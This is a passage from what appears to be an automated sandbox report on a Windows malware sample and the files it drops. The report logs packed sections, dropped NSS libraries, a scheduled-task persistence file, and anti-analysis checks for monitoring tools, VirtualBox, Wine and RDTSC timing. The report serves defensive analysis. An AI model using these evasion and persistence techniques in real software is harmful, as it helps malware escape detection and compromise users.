                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                        Source: wqmnYoVbHr.exeStatic file information: File size 2515456 > 1048576
                        Source: wqmnYoVbHr.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x222e00
                        Source: Binary string: mozglue.pdbP source: wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: nss3.pdb@ source: wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                        Source: Binary string: nss3.pdb source: wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: mozglue.pdb source: wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeUnpacked PE file: 0.2.wqmnYoVbHr.exe.580000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeUnpacked PE file: 8.2.AFHDAKJKFC.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kvnoqpwr:EW;skikhnnm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kvnoqpwr:EW;skikhnnm:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeUnpacked PE file: 10.2.explortu.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kvnoqpwr:EW;skikhnnm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kvnoqpwr:EW;skikhnnm:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeUnpacked PE file: 14.2.cb41bc9329.exe.720000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8C3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6C8C3480
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .data
                        Source: explortu.exe.8.drStatic PE information: real checksum: 0x1d5580 should be: 0x1d6fa2
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: real checksum: 0x1d5580 should be: 0x1d6fa2
                        Source: random[1].exe.13.drStatic PE information: real checksum: 0x0 should be: 0x26de86
                        Source: wqmnYoVbHr.exeStatic PE information: real checksum: 0x0 should be: 0x26de86
                        Source: cb41bc9329.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x26de86
                        Source: amadka[1].exe.0.drStatic PE information: real checksum: 0x1d5580 should be: 0x1d6fa2
                        Source: wqmnYoVbHr.exeStatic PE information: section name:
                        Source: wqmnYoVbHr.exeStatic PE information: section name:
                        Source: wqmnYoVbHr.exeStatic PE information: section name:
                        Source: wqmnYoVbHr.exeStatic PE information: section name:
                        Source: wqmnYoVbHr.exeStatic PE information: section name:
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name:
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name: .idata
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name:
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name: kvnoqpwr
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name: skikhnnm
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name: .taggant
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: .idata
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: kvnoqpwr
                        Source: amadka[1].exe.0.drStatic PE information: section name: skikhnnm
                        Source: amadka[1].exe.0.drStatic PE information: section name: .taggant
                        Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                        Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                        Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                        Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                        Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                        Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                        Source: explortu.exe.8.drStatic PE information: section name:
                        Source: explortu.exe.8.drStatic PE information: section name: .idata
                        Source: explortu.exe.8.drStatic PE information: section name:
                        Source: explortu.exe.8.drStatic PE information: section name: kvnoqpwr
                        Source: explortu.exe.8.drStatic PE information: section name: skikhnnm
                        Source: explortu.exe.8.drStatic PE information: section name: .taggant
                        Source: random[1].exe.13.drStatic PE information: section name:
                        Source: random[1].exe.13.drStatic PE information: section name:
                        Source: random[1].exe.13.drStatic PE information: section name:
                        Source: random[1].exe.13.drStatic PE information: section name:
                        Source: random[1].exe.13.drStatic PE information: section name:
                        Source: cb41bc9329.exe.13.drStatic PE information: section name:
                        Source: cb41bc9329.exe.13.drStatic PE information: section name:
                        Source: cb41bc9329.exe.13.drStatic PE information: section name:
                        Source: cb41bc9329.exe.13.drStatic PE information: section name:
                        Source: cb41bc9329.exe.13.drStatic PE information: section name:
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8FB536 push ecx; ret 0_2_6C8FB549
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA927A0 push 7EA90002h; ret 14_2_7EA927AF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA924A0 push 7EA90002h; ret 14_2_7EA924AF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA909A0 push 7EA90002h; ret 14_2_7EA909AF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA90CA0 push 7EA90002h; ret 14_2_7EA90CAF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA90FA0 push 7EA90002h; ret 14_2_7EA90FAF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA912A0 push 7EA90002h; ret 14_2_7EA912AF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA915A0 push 7EA90002h; ret 14_2_7EA915AF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA918A0 push 7EA90002h; ret 14_2_7EA918AF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA91BA0 push 7EA90002h; ret 14_2_7EA91BAF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA91EA0 push 7EA90002h; ret 14_2_7EA91EAF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA921A0 push 7EA90002h; ret 14_2_7EA921AF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA926B0 push 7EA90002h; ret 14_2_7EA926BF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA90BB0 push 7EA90002h; ret 14_2_7EA90BBF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA90EB0 push 7EA90002h; ret 14_2_7EA90EBF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA911B0 push 7EA90002h; ret 14_2_7EA911BF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA914B0 push 7EA90002h; ret 14_2_7EA914BF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA917B0 push 7EA90002h; ret 14_2_7EA917BF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA91AB0 push 7EA90002h; ret 14_2_7EA91ABF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA91DB0 push 7EA90002h; ret 14_2_7EA91DBF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA920B0 push 7EA90002h; ret 14_2_7EA920BF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA923B0 push 7EA90002h; ret 14_2_7EA923BF
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA92680 push 7EA90002h; ret 14_2_7EA9268F
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA90B80 push 7EA90002h; ret 14_2_7EA90B8F
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA90E80 push 7EA90002h; ret 14_2_7EA90E8F
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA91180 push 7EA90002h; ret 14_2_7EA9118F
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA91480 push 7EA90002h; ret 14_2_7EA9148F
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA91780 push 7EA90002h; ret 14_2_7EA9178F
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA91A80 push 7EA90002h; ret 14_2_7EA91A8F
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA91D80 push 7EA90002h; ret 14_2_7EA91D8F
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA92080 push 7EA90002h; ret 14_2_7EA9208F
                        Source: wqmnYoVbHr.exeStatic PE information: section name: entropy: 7.995047808192606
                        Source: wqmnYoVbHr.exeStatic PE information: section name: entropy: 7.97800602768569
                        Source: wqmnYoVbHr.exeStatic PE information: section name: entropy: 7.950066379373929
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name: entropy: 7.9863650425145885
                        Source: AFHDAKJKFC.exe.0.drStatic PE information: section name: kvnoqpwr entropy: 7.955195838755648
                        Source: amadka[1].exe.0.drStatic PE information: section name: entropy: 7.9863650425145885
                        Source: amadka[1].exe.0.drStatic PE information: section name: kvnoqpwr entropy: 7.955195838755648
                        Source: explortu.exe.8.drStatic PE information: section name: entropy: 7.9863650425145885
                        Source: explortu.exe.8.drStatic PE information: section name: kvnoqpwr entropy: 7.955195838755648
                        Source: random[1].exe.13.drStatic PE information: section name: entropy: 7.995047808192606
                        Source: random[1].exe.13.drStatic PE information: section name: entropy: 7.97800602768569
                        Source: random[1].exe.13.drStatic PE information: section name: entropy: 7.950066379373929
                        Source: cb41bc9329.exe.13.drStatic PE information: section name: entropy: 7.995047808192606
                        Source: cb41bc9329.exe.13.drStatic PE information: section name: entropy: 7.97800602768569
                        Source: cb41bc9329.exe.13.drStatic PE information: section name: entropy: 7.950066379373929
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeFile created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeFile created: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exeJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeFile created: C:\Windows\Tasks\explortu.jobJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C9255F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6C9255F0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 62D233 second address: 62D23D instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF7C6A41ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 62D23D second address: 62CA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 ja 00007FAF7CBD5D3Ch 0x0000000f sub dword ptr [ebp+122D18A2h], ebx 0x00000015 push dword ptr [ebp+122D0491h] 0x0000001b jmp 00007FAF7CBD5D46h 0x00000020 call dword ptr [ebp+122D2F7Ch] 0x00000026 pushad 0x00000027 sub dword ptr [ebp+122D2163h], ebx 0x0000002d xor eax, eax 0x0000002f jno 00007FAF7CBD5D42h 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 pushad 0x0000003a mov dword ptr [ebp+122D2163h], ebx 0x00000040 popad 0x00000041 mov dword ptr [ebp+122D38AAh], eax 0x00000047 stc 0x00000048 cmc 0x00000049 mov esi, 0000003Ch 0x0000004e jnp 00007FAF7CBD5D42h 0x00000054 jmp 00007FAF7CBD5D3Ch 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d jbe 00007FAF7CBD5D47h 0x00000063 jmp 00007FAF7CBD5D41h 0x00000068 lodsw 0x0000006a sub dword ptr [ebp+122D2163h], edx 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 mov dword ptr [ebp+122D2163h], edi 0x0000007a sub dword ptr [ebp+122D2C2Dh], esi 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007FAF7CBD5D45h 0x00000089 pushad 0x0000008a cmc 0x0000008b mov eax, dword ptr [ebp+122D364Eh] 0x00000091 popad 0x00000092 nop 0x00000093 pushad 0x00000094 jne 00007FAF7CBD5D38h 0x0000009a jmp 00007FAF7CBD5D3Bh 0x0000009f popad 0x000000a0 push eax 0x000000a1 je 00007FAF7CBD5D5Ah 0x000000a7 push eax 0x000000a8 push edx 0x000000a9 jmp 00007FAF7CBD5D42h 0x000000ae rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7B0D41 second address: 7B0D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7AFFA6 second address: 7AFFC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D45h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7B021E second address: 7B0234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAF7C6A41ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7B0234 second address: 7B0248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7B0399 second address: 7B039E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7B039E second address: 7B03A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7B03A4 second address: 7B03C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B1h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d js 00007FAF7C6A41A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
